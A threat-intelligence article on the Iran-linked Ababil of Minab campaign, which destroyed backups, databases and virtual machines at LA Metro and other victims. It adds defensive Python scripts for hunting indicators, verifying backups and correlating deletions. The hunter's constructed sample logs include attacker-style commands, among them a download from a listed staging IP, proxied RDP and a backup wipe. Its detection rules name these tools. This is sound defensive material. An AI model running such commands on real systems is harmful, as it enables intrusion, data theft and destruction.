Iran-Linked Ababil of Minab Campaign Targeted IT, Backups, and Recovery Systems
An Iran-linked cyber campaign tied to the pro-Iran persona Ababil of Minab targeted organizations in the United States, Israel, Saudi Arabia, and Turkey, with some intrusions moving from data theft into deliberate destruction of IT, virtualization, database, storage, and backup systems.
Gambit Security said the activity surfaced publicly in late March and early April 2026 after Ababil of Minab claimed attacks against Los Angeles County Metropolitan Transportation Authority, also known as LA Metro, and other organizations. Gambit said forensic evidence links the persona to infrastructure and activity associated with Iran’s Ministry of Intelligence and Security.
The campaign matters because it focused on the recovery layer. Instead of only stealing files or defacing websites, the attackers deleted virtual machines, databases, storage volumes, operating system files, and backups in an effort to make restoration harder.
What Happened in the Ababil of Minab Campaign
The public side of the campaign began with claims against LA Metro, but the same persona also claimed attacks affecting South Florida Regional Transportation Authority, Vyncs owner Agnik, and Saudi infrastructure company UNIMAC. Reuters reported that Gambit linked the LA Metro breach to Iranian hackers and said the attackers stole at least 700 GB of emails, backups, and other files from the agency.
LA Metro detected unauthorized activity in mid-March and limited employee access to internal administrative systems while it investigated. The Los Angeles Times reported that essential rail and bus service continued, but the agency had to review about 1,400 servers before restoring access.
The attackers presented themselves as an independent pro-Iranian hacktivist group. Gambit’s analysis challenged that framing, tying the operation to Black Shadow-related infrastructure and activity that Israeli authorities and security researchers have associated with Iran’s intelligence services.
Key Details at a Glance
| Item | Details |
|---|---|
| Persona | Ababil of Minab |
| Attribution assessment | Iran-linked activity tied by Gambit to MOIS-associated infrastructure |
| Reported countries | United States, Israel, Saudi Arabia, and Turkey |
| Publicly claimed victims | LA Metro, South Florida Regional Transportation Authority, Vyncs, and UNIMAC |
| Main impact | Data theft and destructive activity against IT, virtualization, storage, database, and backup systems |
| Notable tooling | FileFiend, custom Flask receiver, Go tunneler, WipeFile, proxychains, xfreerdp, axel |
Cybersecurity Dive reported that Gambit attributed the operation to Black Shadow, a group linked by Israeli government and private security reporting to Iran’s Ministry of Intelligence and Security. The report also noted destructive activity against transportation, GPS tracking, and infrastructure targets.
The campaign fits two MITRE ATT&CK techniques: Data Destruction (T1485), which covers deleting, overwriting, or corrupting files and data to interrupt system availability, and Inhibit System Recovery (T1490), which covers deleting or disabling backups, snapshots, and other recovery options.
LA Metro Was Disrupted, but Transit Service Continued
LA Metro publicly said it limited internal system access after its security team discovered unauthorized activity. The agency said essential rail and bus service continued, along with safety and security systems, while teams worked to restore internal access.
The disruption still affected riders. Reporting on the breach said the agency was still bringing systems back online weeks after detection, and local coverage at the time described arrival board and fare-loading problems for some customers.
The key lesson for transit and other critical infrastructure operators is that service continuity does not mean the incident lacked impact. Even when vehicles keep running, a cyberattack can damage administrative systems, payment services, customer information tools, internal servers, and recovery operations.
How the Attackers Targeted Recovery Systems
Gambit described a destructive playbook that attacked multiple layers of enterprise recovery. The attackers did not rely on one method. They combined scripted automation with hands-on keyboard activity against virtual machines, storage volumes, databases, Windows folders, and backup chains.
At some victims, the attackers reportedly deleted or powered off virtual machines through management consoles. In other cases, they targeted SQL Server databases, backup files, web hosting directories, and Windows system folders. This forced victims to rebuild more than one layer at the same time.
The Gambit report said the campaign’s destructive operations hit IT, applications, virtualization infrastructure, and backups. That kind of layered destruction can turn a normal restoration process into a complex recovery effort involving servers, identity systems, applications, databases, storage, and backups.
Observed Destructive Techniques
| Target Layer | Observed Activity | Operational Risk |
|---|---|---|
| Virtualization | Deleting or powering off virtual machines through management access | Loss of core systems and longer rebuild time |
| Databases | Dropping SQL Server databases through automation | Loss of application data and business records |
| Backups | Deleting daily database backup files and backup folders | Reduced chance of restoring clean systems quickly |
| Storage | Wiping volumes and renaming partitions | Destruction of local data and recovery targets |
| Operating system files | Deleting core Windows directories through manual activity | System instability and session loss |
The Vyncs incident showed how quickly database destruction can scale. Cybersecurity Dive’s report said attackers used Python scripts to delete operating system folders, databases, and backup files for the Vyncs car GPS tracker service.
The attackers also used public claims and propaganda to magnify the disruption. That combination of technical destruction and psychological pressure is common in influence-oriented cyber operations, especially when a state-linked actor wants a breach to have public effect.
Custom Tools Point to a Broader Operation
Investigators also found custom tooling for data theft. One tool compressed stolen files and uploaded them to a publicly reachable website controlled by the victim, from which the attackers then retrieved them using their own infrastructure. Another tool, called FileFiend, scanned drives and network shares and sent files to a hardcoded command-and-control server.

The campaign also used a Flask-based file receiver, Go tunneling tools, proxied RDP access, and command-line utilities for file movement. These tools suggest the attackers built a workflow for both exfiltration and destructive follow-up activity.
Reuters noted that Ababil also claimed hacks affecting Tri-Rail, the commuter rail service run by the South Florida Regional Transportation Authority, as well as Vyncs and UNIMAC. The Reuters report said additional victims identified by Gambit included organizations in Israel and Turkey that were not named publicly.
Selected Indicators of Compromise
| Type | Indicator | Description |
|---|---|---|
| IPv4 | 31.172.87.20 | Operator staging server |
| IPv4 | 212.83.61.213 | FileFiend command-and-control server |
| IPv4 | 66.85.26.183 | FileFiend command-and-control server |
| IPv4 | 195.20.17.129 | FileFiend command-and-control server |
| IPv4 | 46.246.125.131 | Source IP for propaganda infrastructure |
| IPv4 | 91.193.19.198 | Attacker-controlled exit node |
| Domain | nefeshhope[.]com | Operator-controlled site |
| Domain | members.nefeshhope[.]com | Observed communicating with Go tunneler |
| Domain | banujcobaar[.]com | Redirect infrastructure |
| Filename | Exchangedb.exe | Decoy filename for FileFiend uploader |
| Tool | proxychains | Used for proxied access |
| Tool | xfreerdp | Used for remote desktop access |
| Tool | axel | Command-line download accelerator used in exfiltration workflows |
| Tool | WipeFile | Windows secure deletion utility |
These indicators should support threat hunting, but they should not replace behavioral monitoring. The infrastructure and filenames can change, while the core behavior remains more stable: remote access, data staging, backup targeting, database deletion, virtualization console abuse, and recovery sabotage.
Defenders should also watch for hands-on-keyboard activity during destructive phases. Scripted deletion may run quickly, but manual access through RDP, web consoles, database tools, file managers, and backup panels can expose the attacker’s workflow.
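The Python script below is an added example, not tooling from Gambit or from this article, showing how the indicators in the table can be combined with behavioral rules during a hunt. It re-fangs the published `[.]` domains, matches IPs, domains (including subdomains of a listed domain) and the decoy filename against log lines, and separately flags tradecraft that survives infrastructure changes: proxychains-wrapped xfreerdp, axel downloads, archive staging, and WipeFile execution. The log lines and their key=value layout are constructed for illustration; the IP, domain and filename values are those listed above.

```python
"""Hunt log lines against the published Ababil of Minab indicators and a few
behavioral rules. Added example: the log lines below are constructed and their
field layout is an assumption; the indicator values come from the table above."""
import re
from dataclasses import dataclass

IOC_IPS = {
    "31.172.87.20": "operator staging server",
    "212.83.61.213": "FileFiend command-and-control server",
    "66.85.26.183": "FileFiend command-and-control server",
    "195.20.17.129": "FileFiend command-and-control server",
    "46.246.125.131": "source IP for propaganda infrastructure",
    "91.193.19.198": "attacker-controlled exit node",
}
# Domains are kept defanged as published and re-fanged only at match time.
IOC_DOMAINS_DEFANGED = {
    "nefeshhope[.]com": "operator-controlled site",
    "members.nefeshhope[.]com": "observed with the Go tunneler",
    "banujcobaar[.]com": "redirect infrastructure",
}
IOC_FILENAMES = {"exchangedb.exe": "decoy filename for the FileFiend uploader"}

# Tradecraft rules: these keep working when IPs, domains and filenames rotate.
BEHAVIOR_RULES = [
    ("proxied RDP (proxychains + xfreerdp)",
     re.compile(r"proxychains\b.*\bxfreerdp|xfreerdp\b.*\bproxychains", re.I)),
    ("download accelerator (axel)", re.compile(r"\baxel\b", re.I)),
    ("archive staging before exfiltration",
     re.compile(r"\b(?:7z|rar)\s+a\b|\btar\s+-?c|Compress-Archive", re.I)),
    ("secure deletion utility (WipeFile)", re.compile(r"\bwipefile\b", re.I)),
]
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)


def refang(indicator: str) -> str:
    """Turn a published 'a[.]b' indicator back into a matchable hostname."""
    return indicator.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d): desc for d, desc in IOC_DOMAINS_DEFANGED.items()}


@dataclass(frozen=True)
class Hit:
    line_no: int
    kind: str     # "ioc" for an infrastructure/file match, "behavior" for a tradecraft rule
    detail: str


def hunt(lines):
    """Return every IOC and behavior hit; one line can produce several hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IP_RE.findall(line):
            if ip in IOC_IPS:
                hits.append(Hit(n, "ioc", f"ip {ip}: {IOC_IPS[ip]}"))
        for host in {h.lower() for h in HOST_RE.findall(line)}:
            for dom, desc in IOC_DOMAINS.items():
                # exact match or any subdomain of a listed domain
                if host == dom or host.endswith("." + dom):
                    hits.append(Hit(n, "ioc", f"domain {host} -> {dom}: {desc}"))
        lowered = line.lower()
        for name, desc in IOC_FILENAMES.items():
            if name in lowered:
                hits.append(Hit(n, "ioc", f"file {name}: {desc}"))
        for label, rule in BEHAVIOR_RULES:
            if rule.search(line):
                hits.append(Hit(n, "behavior", label))
    return hits


# Constructed sample lines (not real telemetry), in an assumed key=value layout.
SAMPLE_LOGS = [
    '2026-03-12T03:14:07Z host=fs01 user=svc_backup cmd="proxychains xfreerdp /v:10.20.0.5 /u:admin" src=91.193.19.198',
    '2026-03-12T03:22:41Z host=fs01 user=svc_backup cmd="7z a staged.7z D:\\Shares\\Finance"',
    '2026-03-12T03:40:02Z host=web01 proc=Exchangedb.exe dst=212.83.61.213:443 bytes_out=734003200',
    '2026-03-12T04:01:55Z host=web01 dns_query=members.nefeshhope.com qtype=A',
    '2026-03-12T04:05:10Z host=db02 user=svc_backup cmd="WipeFile.exe D:\\Backups\\daily"',
    '2026-03-12T08:00:00Z host=ws17 user=jdoe dns_query=login.microsoftonline.com qtype=A',
    '2026-03-12T04:10:33Z host=web01 cmd="axel -n 8 http://31.172.87.20/t.bin"',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS):
        print(f"line {hit.line_no:>2} [{hit.kind}] {hit.detail}")
```

A query for `members.nefeshhope.com` deliberately produces two hits, one for the listed subdomain and one for its parent, so a rotated subdomain under the same registered domain is still caught. The benign line (a normal Microsoft login lookup) produces nothing, while the staging, proxied-RDP and WipeFile lines fire on behavior alone, which is the point of pairing the two rule sets.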
What Critical Infrastructure Operators Should Do Now
- Separate backup management from normal domain administration.
- Use immutable or offline backups for critical systems and test restores regularly.
- Restrict access to virtualization consoles, backup portals, storage systems, and database administration tools.
- Alert on mass deletion of virtual machines, storage volumes, databases, backup chains, and operating system folders.
- Monitor for unusual RDP sessions, proxychains use, bulk file compression, and command-line transfer tools.
- Require multi-factor authentication for backup, virtualization, cloud, and privileged administrative platforms.
- Log and protect recovery systems with the same priority as production systems.
- Run recovery exercises that assume attackers have attempted to delete backups.
The CISA StopRansomware Guide advises organizations to maintain offline, encrypted backups and regularly test them. Although this campaign was not a conventional ransomware case, the same recovery principles apply because attackers deliberately targeted data and backups.
Organizations should also harden recovery identities. Backup administrators, hypervisor administrators, storage administrators, database administrators, and domain administrators should not all share the same access path. One compromised account should not give an attacker the ability to delete both production and recovery systems.
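The following Python script is an added example, not part of the CISA guidance or the Gambit report, of the kind of restore-readiness check the two paragraphs above call for: it seals a backup repository's file hashes in an HMAC-protected manifest, then verifies the live repository against both the manifest and the expected daily chain, so deleted, truncated, or silently altered backup files are caught before a restore is attempted. The directory layout, the `CustomerDB_<date>.bak` naming, the manifest format and the key are assumptions; the key stands in for one held on an offline or immutable system rather than on the backup host.

```python
"""Verify a daily backup chain against an HMAC-sealed manifest. Added example:
the repository layout, file names and manifest format are assumptions, and the
key stands in for one kept off the backup host (offline or immutable storage)."""
import hashlib
import hmac
import json
import tempfile
from datetime import date, timedelta
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(repo: Path, key: bytes) -> dict:
    """Record every backup file's hash and seal the listing with an HMAC."""
    files = {p.name: sha256_file(p) for p in sorted(repo.iterdir()) if p.is_file()}
    body = json.dumps(files, sort_keys=True).encode()
    return {"files": files, "tag": hmac.new(key, body, hashlib.sha256).hexdigest()}


def verify_repo(repo: Path, manifest: dict, key: bytes, expected_days: list) -> dict:
    """Compare the live repository to the manifest and to the expected daily chain.
    The chain check is independent of the manifest, so deleting both a backup and
    its manifest entry still shows up as a gap."""
    body = json.dumps(manifest["files"], sort_keys=True).encode()
    tag_ok = hmac.compare_digest(manifest["tag"], hmac.new(key, body, hashlib.sha256).hexdigest())
    present = {p.name: sha256_file(p) for p in repo.iterdir() if p.is_file()}
    recorded = manifest["files"]
    missing = sorted(n for n in recorded if n not in present)
    modified = sorted(n for n in recorded if n in present and present[n] != recorded[n])
    unexpected = sorted(n for n in present if n not in recorded)
    gaps = [d.isoformat() for d in expected_days if f"CustomerDB_{d.isoformat()}.bak" not in present]
    return {"manifest_tag_ok": tag_ok, "missing": missing, "modified": modified,
            "unexpected": unexpected, "chain_gaps": gaps,
            "restorable": tag_ok and not missing and not modified and not gaps}


def demo() -> dict:
    """Build a clean repository, seal it, then simulate the destructive phase:
    two daily backups deleted, one truncated, and a manifest edited to hide it."""
    key = b"manifest-key-held-offline"    # assumption: not stored on the backup host
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp)
        days = [date(2026, 3, 6) + timedelta(days=i) for i in range(7)]
        for d in days:   # constructed backup files, not real database dumps
            (repo / f"CustomerDB_{d.isoformat()}.bak").write_bytes(f"backup {d}\n".encode() * 64)
        manifest = build_manifest(repo, key)
        clean = verify_repo(repo, manifest, key, days)
        (repo / "CustomerDB_2026-03-11.bak").unlink()
        (repo / "CustomerDB_2026-03-12.bak").unlink()
        (repo / "CustomerDB_2026-03-10.bak").write_bytes(b"")
        damaged = verify_repo(repo, manifest, key, days)
        # Attacker also drops the deleted files from the manifest: the HMAC no longer verifies.
        still_there = {p.name for p in repo.iterdir()}
        forged = {"files": {n: h for n, h in manifest["files"].items() if n in still_there},
                  "tag": manifest["tag"]}
        forged_check = verify_repo(repo, forged, key, days)
    return {"clean": clean, "damaged": damaged, "forged": forged_check}


if __name__ == "__main__":
    for stage, report in demo().items():
        print(stage, json.dumps(report, indent=1))
```

Run on a schedule from a host that does not share credentials with the backup administrators, this turns "we have backups" into a checked claim: the HMAC detects a manifest edited to cover deletions, the hash comparison detects truncation or overwriting, and the date-chain check detects gaps even when the manifest itself was rewritten.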
Detection Priorities for Destructive Attacks
| Detection Area | What to Watch | Why It Matters |
|---|---|---|
| Virtualization | Mass VM deletion, shutdown, snapshot deletion, or console login from unusual IPs | Attackers may use the management layer to erase many systems at once |
| Databases | Bulk DROP DATABASE commands and sudden backup file deletion | Database destruction can remove application data and recovery points |
| Backups | Backup chain deletion, retention policy changes, repository access, and failed restore tests | Recovery systems are a primary target in destructive campaigns |
| File systems | Mass deletion of system folders, web roots, and storage volumes | Attackers may combine automation with manual wiping |
| Remote access | RDP via proxies, new tunneling binaries, and unexpected admin sessions | Hands-on activity often precedes final destruction |
Security teams should map this activity to MITRE ATT&CK Data Destruction (T1485) and Inhibit System Recovery (T1490). These categories help defenders build detection rules around destructive behavior instead of chasing only one malware family or one file hash.
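As an added example, not detection logic from Gambit or from any product, the Python below implements the correlation the detection table and the ATT&CK mapping describe: it keeps a sliding window of destructive events per actor, raises a mass-deletion alert when one layer (virtualization, databases, backups, storage, operating system files) is hit repeatedly, and raises a separate cross-layer alert when backups are hit alongside another layer or three layers fall within the window, tagging each alert with T1485 or T1490. The event kinds, actors, targets and the normalized field names are constructed assumptions rather than a real hypervisor, SQL Server or backup product schema, and the choice of which kinds count as T1490 is the example's own.

```python
"""Correlate destructive events across recovery layers and map them to ATT&CK.
Added example: event kinds, actors and targets are constructed; the field names
are an assumed normalized schema rather than any product's native log format."""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Event kind -> layer from the detection table. Kinds not listed are ignored.
LAYER_OF = {
    "vm.delete": "virtualization", "vm.poweroff": "virtualization",
    "snapshot.delete": "virtualization",
    "sql.drop_database": "databases",
    "backup.file_delete": "backups", "backup.retention_change": "backups",
    "volume.wipe": "storage", "partition.rename": "storage",
    "fs.dir_delete": "os_files",
}
# Recovery-inhibiting kinds map to T1490; everything else destructive is T1485.
# This mapping is the example's own choice, not taken from the Gambit report.
T1490_KINDS = {"backup.file_delete", "backup.retention_change", "snapshot.delete"}
WINDOW = timedelta(minutes=15)   # sliding window per actor
MASS_THRESHOLD = 5               # same-layer events by one actor within WINDOW


@dataclass(frozen=True)
class Event:
    ts: datetime
    actor: str
    kind: str
    target: str


@dataclass(frozen=True)
class Alert:
    actor: str
    rule: str
    techniques: tuple
    detail: str


def correlate(events):
    """Emit one alert per (actor, rule) for mass same-layer deletion and for
    destruction that spans recovery layers within the window."""
    recent = defaultdict(deque)   # actor -> deque of (ts, layer, kind)
    fired = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        layer = LAYER_OF.get(ev.kind)
        if layer is None:
            continue                       # not a destructive event kind
        window = recent[ev.actor]
        window.append((ev.ts, layer, ev.kind))
        while window and ev.ts - window[0][0] > WINDOW:
            window.popleft()               # forget events older than the window
        per_layer = defaultdict(int)
        for _, lyr, _ in window:
            per_layer[lyr] += 1
        techniques = tuple(sorted({"T1490" if k in T1490_KINDS else "T1485"
                                   for _, _, k in window}))

        rule = f"mass:{layer}"
        if per_layer[layer] >= MASS_THRESHOLD and (ev.actor, rule) not in fired:
            fired.add((ev.actor, rule))
            alerts.append(Alert(ev.actor, rule, techniques,
                                f"{per_layer[layer]} {layer} events within {WINDOW}; last target {ev.target}"))

        layers = set(per_layer)
        # Backups plus any other layer, or three layers at once, is the layered
        # destruction pattern described above rather than routine administration.
        spans_layers = len(layers) >= 3 or ("backups" in layers and len(layers) >= 2)
        if spans_layers and (ev.actor, "cross-layer") not in fired:
            fired.add((ev.actor, "cross-layer"))
            alerts.append(Alert(ev.actor, "cross-layer", techniques,
                                "layers hit: " + ", ".join(sorted(layers))))
    return alerts


# Constructed sample: one account runs the destructive playbook; an admin does routine work.
T0 = datetime(2026, 3, 12, 2, 0)
SAMPLE_EVENTS = [Event(T0 + timedelta(minutes=i), "svc_backup", "vm.delete", f"vm-app-{i:02d}")
                 for i in range(5)]
SAMPLE_EVENTS += [
    Event(T0 + timedelta(minutes=6), "svc_backup", "sql.drop_database", "CustomerDB"),
    Event(T0 + timedelta(minutes=7), "svc_backup", "backup.file_delete", r"D:\Backups\CustomerDB_2026-03-11.bak"),
    Event(T0 + timedelta(minutes=7, seconds=30), "svc_backup", "backup.file_delete", r"D:\Backups\CustomerDB_2026-03-10.bak"),
    Event(T0 + timedelta(hours=12), "jdoe", "vm.poweroff", "vm-test-01"),
    Event(T0 + timedelta(hours=12, minutes=1), "jdoe", "vm.poweroff", "vm-test-02"),
    Event(T0 + timedelta(hours=12, minutes=30), "jdoe", "snapshot.delete", "vm-test-01/snap-1"),
    Event(T0 + timedelta(hours=12, minutes=31), "jdoe", "user.login", "vcenter"),   # not destructive
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a.actor} {a.rule} {a.techniques}: {a.detail}")
```

The routine administrator never alerts: two power-offs and a snapshot deletion half an hour later fall outside the window and stay within one layer. The service account alerts twice, first on the fifth VM deletion and again the moment a backup file goes after the database drop, with the cross-layer alert carrying both T1485 and T1490. Thresholds and the window are tuning knobs; what matters is that the backup layer is weighted so that a single deletion there, in combination with destruction elsewhere, is enough.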
Backup architecture also needs an adversary-focused review. The CISA guidance recommends tested backup and recovery practices, but organizations should also confirm whether backup consoles, credentials, storage repositories, and restore processes can survive a privileged intrusion.
Why the Campaign Matters
Ababil of Minab shows how destructive cyber operations can target the systems that make recovery possible. A victim can have backups on paper, but if attackers delete backup chains, wipe storage, remove virtual machines, and damage operating systems, recovery becomes slow and uncertain.
The campaign also shows why attribution alone should not drive response. Whether an attacker claims hacktivism or state-linked motives, defenders need to prepare for the same operational reality: attackers may destroy production systems and recovery infrastructure before defenders finish containment.
For critical infrastructure, transportation, education, insurance, and public-sector organizations, the priority is resilience. The question is no longer only whether attackers can get in. It is whether the organization can keep enough trusted systems, backups, identities, and recovery tooling intact to bring operations back.
FAQ
Ababil of Minab is a pro-Iranian cyber persona that claimed attacks against organizations including LA Metro, Tri-Rail, Vyncs, and UNIMAC. Gambit Security linked the activity to Iran-associated infrastructure and Black Shadow-related operations.
LA Metro said essential rail and bus service continued, along with safety and security systems. However, public reporting described disruptions to customer-facing systems such as arrival information and some fare-loading services.
The attackers targeted more than normal user data. Reports describe deletion of virtual machines, databases, backup files, storage volumes, operating system files, and recovery infrastructure at a subset of victims.
Public reporting linked Ababil of Minab claims or activity to LA Metro, South Florida Regional Transportation Authority, Vyncs owner Agnik, and Saudi infrastructure company UNIMAC. Gambit also identified additional unnamed victims in Israel and Turkey.
Organizations should isolate backup systems, use immutable or offline backups, test restores, protect virtualization and backup consoles with strong authentication, monitor for mass deletion, and restrict privileged access to recovery infrastructure.